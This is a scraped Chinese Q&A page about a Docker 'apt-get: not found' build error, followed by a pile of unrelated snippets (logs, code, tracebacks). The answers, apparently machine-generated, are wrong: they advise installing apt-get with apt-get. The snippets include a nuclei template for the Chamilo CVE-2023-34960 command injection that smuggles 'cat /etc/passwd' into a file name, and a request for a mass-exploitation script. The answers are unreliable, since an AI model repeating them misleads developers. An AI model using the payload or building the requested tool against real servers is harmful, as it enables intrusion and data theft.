Sending build context to Docker daemon 108.1MB Step 1/5 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 2/5 : RUN apt-get update && apt-get install -y apt-utils && apt-get install -y apt-get ---> Running in 8e1803471035 /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update && apt-get install -y apt-utils && apt-get install -y apt-get' returned a non-zero code: 127

时间: 2024-01-07 16:07:49 浏览: 313
根据错误提示,似乎是因为在你的Docker镜像中没有安装apt-get命令,导致该命令无法执行。 你可以在Dockerfile中添加一条安装apt-get的指令,例如: ``` RUN apt-get update && \ apt-get install -y apt-utils && \ apt-get install -y apt-get ``` 这会在Docker镜像中安装apt-get命令,使得后续的命令可以正常执行。请注意,这条指令应该在执行apt-get update之前运行。 另外,你也可以尝试使用其他的基础镜像,例如`ubuntu`,它已经包含了apt-get命令,你可以在Dockerfile中使用它代替原来的基础镜像。例如: ``` FROM ubuntu:latest RUN apt-get update && \ apt-get install -y apt-utils && \ apt-get install -y apt-get ``` 希望这可以帮助你解决问题。
相关问题

Sending build context to Docker daemon 108.1MB Step 1/4 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 2/4 : RUN apt-get update ---> Running in 3706e59f53c6 /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update' returned a non-zero code: 127

这个错误提示显示在Dockerfile的第二步中,在运行"apt-get update"命令时出现了错误。根据错误提示,似乎是因为在你的Docker镜像中没有安装apt-get命令,导致该命令无法执行。 解决该问题的方法是需要在Dockerfile中添加一条安装apt-get的指令,例如: ``` RUN apt-get update && \ apt-get install -y apt-utils && \ apt-get install -y apt-get ``` 这会在Docker镜像中安装apt-get命令,使得后续的命令可以正常执行。请注意,这条指令应该在执行apt-get update之前运行。 希望这可以帮助你解决问题。

加了后FROM python:2.7.17RUN apt-get updateRUN apt-get install -y apt-utilsRUN apt-get install -y apt-get还是报错Sending build context to Docker daemon 108.1MB Step 1/9 : FROM python:2.7.17 ---> 01c23fcbab3f Step 2/9 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 3/9 : RUN apt-get update ---> Running in 5ef45f1e3f2c /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update' returned a non-zero code: 127

这个错误提示显示apt-get仍然没有被安装成功。我们可以尝试使用以下命令安装apt-get: ``` RUN apt-get update && apt-get install -y --no-install-recommends apt-utils && \ apt-get install -y apt-get ``` 这个命令会先更新软件包列表,然后安装apt-utils,最后安装apt-get。注意,我们使用了--no-install-recommends参数来避免安装apt-utils的依赖项。
阅读全文

相关推荐

# 使用 Ubuntu 基础镜像 FROM docker.1ms.run/ubuntu:22.04 # 设置非交互模式以避免安装时提示输入 ENV DEBIAN_FRONTEND=noninteractive # 修改源为阿里云镜像,提升构建速度 RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list \ && sed -i 's|http://security.ubuntu.com/ubuntu|http://mirrors.aliyun.com/ubuntu|g' /etc/apt/sources.list \ && rm -rf /var/lib/apt/lists/* \ && apt-get clean \ && apt-get update -y --fix-missing # 更新包管理器并安装所需工具 RUN apt-get update && apt-get install -y \ curl \ git \ build-essential \ sshpass \ libxcomposite1 \ libxrandr2 \ libxtst6 \ libsm6 \ libxdamage1 \ libxfixes3 \ && rm -rf /var/lib/apt/lists/* # 安装 Node.js 和 npm RUN curl -fsSL https://deb.nodesource.com/setup_18.x | bash - \ && apt-get install -y nodejs \ && npm install -g npm@10 # 安装Docker CLI,以便容器可映射到外部通过另一个容器来控制 RUN apt-get update && apt-get install -y docker.io # 安装 Vue CLI RUN npm install -g @vue/cli --registry=https://registry.npmmirror.com # 创建工作目录 WORKDIR /root # 暴露默认的开发服务器端口 EXPOSE 8080 # 启动容器时的默认命令 CMD [ "bash" ]运行后结果: shc123@ubuntu:~/Documents/rb_config$ sudo docker build -t vue-ubuntu-env . Sending build context to Docker daemon 248MB Step 1/10 : FROM docker.1ms.run/ubuntu:22.04 ---> a24be041d957 Step 2/10 : ENV DEBIAN_FRONTEND=noninteractive ---> Using cache ---> 0a78f4d6fc75 Step 3/10 : RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list && sed -i 's|http://security.ubuntu.com/ubuntu|http://mirrors.aliyun.com/ubuntu|g' /etc/apt/sources.list && rm -rf /var/lib/apt/lists/* && apt-get clean && apt-get update -y --fix-missing ---> Running in 746c4cf4af05 Get:1 http://mirrors.aliyun.com/ubuntu jammy InRelease [270 kB] Get:2 http://mirrors.aliyun.com/ubuntu jammy-updates InRelease [128 kB] Get:3 http://mirrors.aliyun.com/ubuntu jammy-backports InRelease [127 kB] Get:4 http://mirrors.aliyun.com/ubuntu jammy-security InRelease

$ /home/qlunlp/software/anaconda3531/bin/conda install pandas environment variables: CIO_TEST=<not set> CONDA_DEFAULT_ENV=mr CONDA_EXE=/home/qlunlp/software/anaconda3531/bin/conda CONDA_PREFIX=/home/qlunlp/software/anaconda3531/envs/mr CONDA_PREFIX_1=/home/qlunlp/software/anaconda3531 CONDA_PROMPT_MODIFIER=(mr) CONDA_PYTHON_EXE=/home/qlunlp/software/anaconda3531/bin/python CONDA_ROOT=/home/qlunlp/software/anaconda3531 CONDA_SHLVL=2 LD_LIBRARY_PATH=/home/qlunlp/software/anaconda3531/envs/paddle_env/lib/:/home/qlunlp/s oftware/anaconda3531/envs/paddle_env/lib/: PATH=/home/qlunlp/software/anaconda3531/envs/mr/bin:/home/qlunlp/software/a naconda3531/bin:/home/qlunlp/.vscode-server/cli/servers/Stable-2fc07b8 11f760549dab9be9d2bedd06c51dfcb9a/server/bin/remote-cli:/home/qlunlp/s oftware/anaconda3531/bin:/home/qlunlp/software/anaconda3531/bin:/usr/l ocal/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr /local/games:/snap/bin:/usr/local/cuda-12.3/bin:/home/qlunlp/.vscode- server/data/User/globalStorage/github.copilot- chat/debugCommand:/usr/local/cuda-12.3/bin REQUESTS_CA_BUNDLE=<not set> SSL_CERT_FILE=/usr/lib/ssl/certs/ca-certificates.crt active environment : mr active env location : /home/qlunlp/software/anaconda3531/envs/mr shell level : 2 user config file : /home/qlunlp/.condarc populated config files : /home/qlunlp/.condarc conda version : 4.5.11 conda-build version : 3.15.1 python version : 3.7.0.final.0 base environment : /home/qlunlp/software/anaconda3531 (writable) channel URLs : https://anaconda.org/linux-64 https://anaconda.org/noarch https://repo.anaconda.com/pkgs/main/linux-64 https://repo.anaconda.com/pkgs/main/noarch https://repo.anaconda.com/pkgs/free/linux-64 https://repo.anaconda.com/pkgs/free/noarch https://repo.anaconda.com/pkgs/r/linux-64 https://repo.anaconda.com/pkgs/r/noarch https://repo.anaconda.com/pkgs/pro/linux-64 https://repo.anaconda.com/pkgs/pro/noarch package cache : /home/qlunlp/software/anaconda3531/pkgs /home/qlunlp/.conda/pkgs envs directories : /home/qlunlp/software/anaconda3531/envs /home/qlunlp/.conda/envs platform : linux-64 user-agent : conda/4.5.11 requests/2.31.0 CPython/3.7.0 Linux/5.15.0-122-generic ubuntu/20.04 glibc/2.31 UID:GID : 1000:1000 netrc file : None offline mode : False An unexpected error has occurred. Conda has prepared the above report. If submitted, this report will be used by core maintainers to improve future releases of conda. Would you like conda to send this report to the core maintainers? [y/N]: y Upload did not complete. Thank you for helping to improve conda. Opt-in to always sending reports (and not see this message again) by running $ conda config --set report_errors true 您输入的问题字符过长,请简短描述您的问题。

[root@cc dockfile]# docker build -t zhangsan . Sending build context to Docker daemon 2.048 kB Step 1/4 : FROM centos:7 ---> eeb6ee3f44bd Step 2/4 : MAINTAINER Macao<[email protected]> ---> Running in 6d911292fdda ---> d61e3702af41 Removing intermediate container 6d911292fdda Step 3/4 : RUN yum -y install vim net-tools ---> Running in 95bb5a65df0f Loaded plugins: fastestmirror, ovl Determining fastest mirrors Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os&infra=container error was 14: curl#6 - "Could not resolve host: mirrorlist.centos.org; Unknown error" One of the configured repositories failed (Unknown), and yum doesn't have enough cached data to continue. At this point the only safe thing yum can do is fail. There are a few ways to work "fix" this: 1. Contact the upstream for the repository and get them to fix the problem. 2. Reconfigure the baseurl/etc. for the repository, to point to a working upstream. This is most often useful if you are using a newer distribution release than is supported by the repository (and the packages for the previous distribution release still work). 3. Run the command with the repository temporarily disabled yum --disablerepo=<repoid> ... 4. Disable the repository permanently, so yum won't use it by default. Yum will then just ignore the repository until you permanently enable it again or use --enablerepo for temporary usage: yum-config-manager --disable <repoid> or subscription-manager repos --disable=<repoid> 5. Configure the failing repository to be skipped, if it is unavailable. Note that yum will try to contact the repo. when it runs most commands, so will have to try and fail each time (and thus. yum will be be much slower). If it is a very temporary problem though, this is often a nice compromise: yum-config-manag

bool MoveObject::goObject() { //connet to the Server, 5s limit while (!move_base.waitForServer(ros::Duration(5.0))) { ROS_INFO("Waiting for move_base action server..."); } ROS_INFO("Connected to move base server"); /t the targetpose move_base_msgs::MoveBaseGoal goal; goal.target_pose.header.frame_id = "map"; goal.target_pose.header.stamp = ros::Time::now(); // goal.target_pose.pose.position.x = Obj_pose.pose.position.x; // goal.target_pose.pose.position.y = Obj_pose.pose.position.y; // target_odom_point.pose.pose.position.x=goal.target_pose.pose.position.x // target_odom_point.pose.pose.position.y=goal.target_pose.pose.position.y target_odom_point.pose.pose.position.x=Obj_pose.pose.position.x; target_odom_point.pose.pose.position.y=Obj_pose.pose.position.y; cout << goal.target_pose.pose.position.x << endl; cout << goal.target_pose.pose.position.y << endl; //goal.target_pose.pose.orientation = tf::createQuaternionMsgFromYaw(g.response.yaw); goal.target_pose.pose.orientation.z = 0.0; goal.target_pose.pose.orientation.w = 1.0; tf::quaternionMsgToTF(target_odom_point.pose.orientation, quat); tf::Matrix3x3(quat).getRPY(roll, pitch, yaw);//进行转换 yaw +=1.5708;//旋转90 target_odom_point.pose.position.x -=keep_distance*cos(yaw); target_odom_point.pose.position.y -=keep_distance*sin(yaw); goal.target_pose.pose.position.x=target_odom_point.pose.pose.position.x goal.target_pose.pose.position.y=target_odom_point.pose.pose.position.y target_odom_point.pose.orientation = tf::createQuaternionMsgFromYaw(yaw); ROS_INFO("Sending goal"); move_base.sendGoal(goal); move_base.waitForResult(); if (move_base.getState() == actionlib::SimpleClientGoalState::SUCCEEDED) { ROS_INFO("Goal succeeded!"); return true; } else { ROS_INFO("Goal failed"); return false; } }

id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950请根据上面的poc,用python实现exp,并且读取当前目录下的文件 批量执行,例如参数 -f 777.txt ,-c “需要执行的命令”需要为动态变量 ,并且-o 7.txt,7.txt为文件名动态变量,让用户自主选择,例如 python CVE-2023-34960exp.py -f 777.txt -c "id" -o 89.txt,并显示详细成功和失败过程,并将利用成功的目标分别存放至用户选择输出的文件里。-o 输出的文件保存利用成功结果 结果输出系统:彩色终端输出(成功绿色/失败红色)、实时显示命令执行结果片段、自动保存成功目标到指定文件、详细统计报告。智能URL处理:自动补全协议头(http/https)自动构造完整的API端点路径。在测试过程中将发包请求和响应,显示出来,增加详细利用过程

=> [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.2s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s [2025-03-18T02:00:33.451Z] [+] Building 0.3s (3/3) docker:orbstack => [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.3s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s [2025-03-18T02:00:33.653Z] [+] Building 0.5s (7/13) docker:orbstack => [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.3s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => CACHED [dev_container_auto_added_stage_label 1/7] FROM mcr.microsoft. 0.0s => CACHED [gcloud 1/1] FROM asia.gcr.io/google.com/cloudsdktool/google-c 0.0s => [internal] load build context 0.0s [2025-03-18T02:00:33.653Z] => => transferring context: 99B 0.0s => [dev_container_auto_added_stage_label 2/7] RUN apk add --no-cache c 0.2s => => # fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/aarch64/APKINDE => => # X.tar.gz [2025-03-18T02:00:33.804Z] [+] Building 0.7s (7/13)

逐行解析一下这些打印XOS#2025/05/28 16:44:15 informational: WMAC_AC: Dis-assocation frame received from station with MAC address 92:aa:0e:84:c5:22 and reason code 3 2025/05/28 16:44:15 informational: WMAC_AC: Sending DEL-STA to AP 1 by CAPWAP with station MAC address 92:aa:0e:84:c5:22 BSSID 6c:ef:c6:65:ab:d1 2025/05/28 16:44:15 notifications: WMAC_AC: [IPC] Sending DELETE-STA to AP by CAPWAP with station MAC 92:aa:0e:84:c5:22. asso seq [0x1000] 2025/05/28 16:44:15 errors : WMAC_AC: Failed to notify L2F to delete sta with MAC address 92:aa:0e:84:c5:22 | vlan 1 | dynamic vlan -1. 2025/05/28 16:44:15 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - event 2 notification 2025/05/28 16:44:15 informational: WMAC_AC: Unauthorizing port for station 92:aa:0e:84:c5:22. 2025/05/28 16:44:15 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - MLME-DISASSOCIATE.indication(92:aa:0e:84:c5:22, 3) 2025/05/28 16:44:15 informational: WMAC_AC: Receiving authention frame from station 92:07:d3:da:91:62. 2025/05/28 16:44:15 informational: WMAC_AC: Receiving authention frame from station 92:07:d3:da:91:62 in bssid 6c:ef:c6:65:ab:d7. auth_alg 0, auth_transaction 1 2025/05/28 16:44:15 informational: WMAC_AC: Authentication OK (Open-System) with bssid 6c:ef:c6:65:ab:d7 . 2025/05/28 16:44:15 informational: WMAC_AC: Receiving association request from sta 92:07:d3:da:91:62 in bssid 6c:ef:c6:65:ab:d7 2025/05/28 16:44:15 warnings : WMAC_AC: IEEE 802.11 element parse ignored unknown element (id=191 elen=12) 2025/05/28 16:44:15 informational: WMAC_AC: Station association succeed with AID: 1, SSID: a-wangjian-portal, BSSID: 6c:ef:c6:65:ab:d7. 2025/05/28 16:44:15 informational: WMAC_AC: Vlan 1 station increasing, count 3. 2025/05/28 16:44:15 notifications: WMAC_AC: [IPC] Sending ADD-STATION to AP by CAPWAP with station MAC 92:07:d3:da:91:62, AID 1 and APID 1 RID 2. assoseq [0x1000] 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3313):send sta online 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3319):sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3324):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 errors : APM: APM_WmacSocket_Recv_Msg(line:975):!!! RECV MSG WMAC_GET_TRAFFIC_LIMIT, StaMac[92:07:d3:da:91:62] 2025/05/28 16:44:15 errors : APM: APM_SendStaTraffic(line:794):APM_SendStaTraffic uplimit 0, downlimit 0 2025/05/28 16:44:15 debugging : APM: APM_WMAC_SendStaTrafficLimit(line:1059):APM_WMAC_SendStaTrafficLimit success 2025/05/28 16:44:15 informational: APM: APM_DecMsgHead(line:71):MessageType 8 MessageLen 50 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: STA_AUTH_SUCCESS 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3061):usProfileId 2 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2855):STA pass time:586 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3206):APM Portal username:admin 2025/05/28 16:44:15 informational: APM: APM_RecvPktProcess(line:2509):[EasyPortal] user $MAC:92:7:d3:da:91:62 auth success, pass time is 600 s 2025/05/28 16:44:15 informational: APM: APM_AddUserNode(line:836):APM_AddUserNode:: User Node is exist (mac = 9207.d3da.9162) 2025/05/28 16:44:15 informational: APM: APM_AddUserNode(line:851):Create user Node timer 2025/05/28 16:44:15 errors : APM: APM_SendStaTraffic(line:794):APM_SendStaTraffic uplimit 0, downlimit 0 2025/05/28 16:44:15 debugging : APM: APM_WMAC_SendStaTrafficLimit(line:1059):APM_WMAC_SendStaTrafficLimit success 2025/05/28 16:44:15 informational: APM: APM_DecMsgHead(line:71):MessageType 25 MessageLen 54 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: User trafic limit 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2732):AP input limit:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2738):AP output limit:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 debugging : APM: APM_SetStaTraffic(line:2399):STA[92:07:d3:da:91:62] inputlimit 0 outlimit 0 2025/05/28 16:44:15 informational: APM: APM_DecMsgHead(line:71):MessageType 7 MessageLen 53 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: STA_ONLINE_RESP 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2843):STA Privilege:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3061):usProfileId 2 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2849):STA Auth Mode:1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2855):STA pass time:600 2025/05/28 16:44:15 informational: APM: APM_RecvPktProcess(line:2500):sta online response 2025/05/28 16:44:15 informational: APM: APM_UpdateUserNode(line:702):APM_AddUserNode:: User Node is exist (mac = 9207.d3da.9162) 2025/05/28 16:44:15 informational: APM: APM_UpdateUserNode(line:752):APM_AddUserNode:: Create user Node timer 2025/05/28 16:44:16 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - deauthenticated due to inactivity 2025/05/28 16:44:16 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - MLME-DEAUTHENTICATE.indication(92:aa:0e:84:c5:22, 2) 2025/05/28 16:44:16 informational: WMAC_AC: Trying to free station with MAC address 92:aa:0e:84:c5:22 and BSSID 6c:ef:c6:65:ab:d1. 2025/05/28 16:44:16 informational: WMAC_AC: Vlan 1 station degression, count 2. 2025/05/28 16:44:16 informational: WMAC_AC: Sending DEL-STA to AP 1 by CAPWAP with station MAC address 92:aa:0e:84:c5:22 BSSID 6c:ef:c6:65:ab:d1 2025/05/28 16:44:16 notifications: WMAC_AC: [IPC] Sending DELETE-STA to AP by CAPWAP with station MAC 92:aa:0e:84:c5:22. asso seq [0x1000] 2025/05/28 16:44:16 errors : WMAC_AC: Failed to notify L2F to delete sta with MAC address 92:aa:0e:84:c5:22 | vlan 1 | dynamic vlan -1.

/home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] ***************************************** W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] Setting OMP_NUM_THREADS environment variable for each process to be 1 in default, to avoid your system being overloaded, please further tune the variable for optimal performance in your application as needed. W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] ***************************************** /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources [rank0]: Traceback (most recent call last): [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank0]: return importlib.import_module("." + module_name, self.__name__) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module [rank0]: return _bootstrap._gcd_import(name[level:], package, level) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "<frozen importlib._bootstrap>", line 1206, in _gcd_import [rank0]: File "<frozen importlib._bootstrap>", line 1178, in _find_and_load [rank0]: File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked [rank0]: File "<frozen importlib._bootstrap>", line 690, in _load_unlocked [rank0]: File "<frozen importlib._bootstrap_external>", line 940, in exec_module [rank0]: File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module> [rank0]: from .tokenization_llama import LlamaTokenizer [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module> [rank0]: import sentencepiece as spm [rank0]: File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module> [rank0]: from . import _sentencepiece [rank0]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank0]: The above exception was the direct cause of the following exception: [rank0]: Traceback (most recent call last): [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer [rank0]: tokenizer = AutoTokenizer.from_pretrained( [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained [rank0]: tokenizer_class_from_name(config_tokenizer_class) is not None [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name [rank0]: return getattr(module, class_name) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__ [rank0]: module = self._get_module(self._class_to_module[name]) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module [rank0]: raise RuntimeError( [rank0]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback): [rank0]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank0]: The above exception was the direct cause of the following exception: [rank0]: Traceback (most recent call last): [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module> [rank0]: launch() [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch [rank0]: run_exp() [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp [rank0]: _training_function(config={"args": args, "callbacks": callbacks}) [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function [rank0]: run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks) [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft [rank0]: tokenizer_module = load_tokenizer(model_args) 